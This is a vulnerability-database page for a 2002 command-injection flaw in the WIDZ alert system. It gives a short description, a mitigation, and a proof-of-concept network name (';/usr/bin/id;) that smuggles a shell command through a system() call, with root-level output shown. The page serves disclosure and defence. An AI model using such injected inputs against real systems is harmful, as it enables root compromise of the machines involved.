header-logo
Suggest Exploit
vendor:
Alert System
by:
SecurityFocus
7.5
CVSS
HIGH
Command Execution
78
CWE
Product Name: Alert System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apple Airport
2002

WIDZ Alert System Command Execution Vulnerability

WIDZ does not validate untrusted input when generating alerts. Alerts pass the essid of an unknown wireless access point through a system() call. By setting the essid of an unauthorized access point to include malformed information, the underlying operating system may be compromised. An attacker can set the essid of an unauthorized access point to include malicious code, which will be executed by the system() call.

Mitigation:

Validate untrusted input when generating alerts.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8479/info

WIDZ does not validate untrusted input when generating alerts. Alerts pass the essid of an unknown wireless access point through a system() call. By setting the essid of an unauthorized access point to include malformed information, the underlying operating system may be compromised. 

Go to Apple Airport and set network name to ';/usr/bin/id;

This will generate the following message:
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file

Navigation

Suggest Exploit

Services By CQR